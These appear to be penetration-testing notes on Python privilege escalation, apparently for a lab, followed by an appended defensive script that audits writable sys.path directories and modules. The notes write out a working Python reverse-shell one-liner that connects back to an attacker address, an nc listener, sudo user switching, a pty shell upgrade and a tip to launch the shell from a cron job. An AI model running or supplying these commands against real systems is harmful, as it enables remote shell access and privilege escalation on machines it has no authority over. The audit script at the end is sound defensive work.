Privilege Escalation
python privilege escalation
requirements: Need to be able to plant a *.py or modify an existing one as a higher privileged user
more at apt-secure.ca
You currently have a terminal (be that in a browser or by some other means). Here are some things to do with Python.
Quickly determine versions of local python
#whereis python
#python -c 'import sys; print(sys.path)' -->get path
open listener on attacking machine (same port as in the connect() call below)
#nc -nlvp 1235
from target terminal (web) run python
python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.157",1235));
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
attacking machine should have shell
do you have a list of users?
  yes
    because you know the users and their shells, you can potentially switch to one of those users
    #sudo -u <diff user name> /bin/bash (or whatever their shell is)
    upgrade shell with python
    #python -c 'import pty; pty.spawn("/bin/bash");'
    you may have root at this point
    you can do a reverse shell from this account
      open listener on attacker
      run reverse shell script above. In some scenarios you may need to run the script from an already running cronjob
  no
    you may not need escalation at this point, but that is unlikely
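
Added example, not part of the original notes: the requirement at the top (being able to plant a *.py or modify an existing one) can be audited from the defender's side by walking the directories in sys.path and flagging any directory or module that accounts other than root or the auditing user can write. The function names and the owner/mode heuristic are assumptions of this example.

```python
import os
import stat
import sys


def risky_mode(st, uid):
    """Return why a path is modifiable by someone other than root/uid, else None."""
    if st.st_mode & stat.S_IWOTH:
        return "world-writable"
    if st.st_mode & stat.S_IWGRP:
        return "group-writable"  # heuristic: review who is in the group
    if st.st_uid not in (0, uid):
        return "owned by uid %d" % st.st_uid
    return None


def audit_import_path(paths=None, uid=None):
    """Report import directories and *.py files that other accounts can modify."""
    paths = sys.path if paths is None else paths
    uid = os.geteuid() if uid is None else uid
    findings = set()  # sys.path entries can nest, so de-duplicate
    for entry in paths:
        entry = os.path.abspath(entry or os.getcwd())  # '' means the cwd
        if not os.path.isdir(entry):
            continue  # zip archives and missing entries are skipped
        for root, _dirs, files in os.walk(entry):
            modules = [os.path.join(root, f) for f in files if f.endswith(".py")]
            for path in [root] + modules:
                try:
                    st = os.stat(path)
                except OSError:
                    continue  # dangling symlink or unreadable entry
                reason = risky_mode(st, uid)
                if reason:
                    findings.add((path, reason))
    return sorted(findings)


if __name__ == "__main__":
    # Run as the account whose Python jobs (cron, sudo rules) you want to protect.
    for path, reason in audit_import_path():
        print("%-18s %s" % (reason, path))
```

A writable directory is reported as well as writable modules, because a new file dropped into an import directory can shadow a module found later in sys.path.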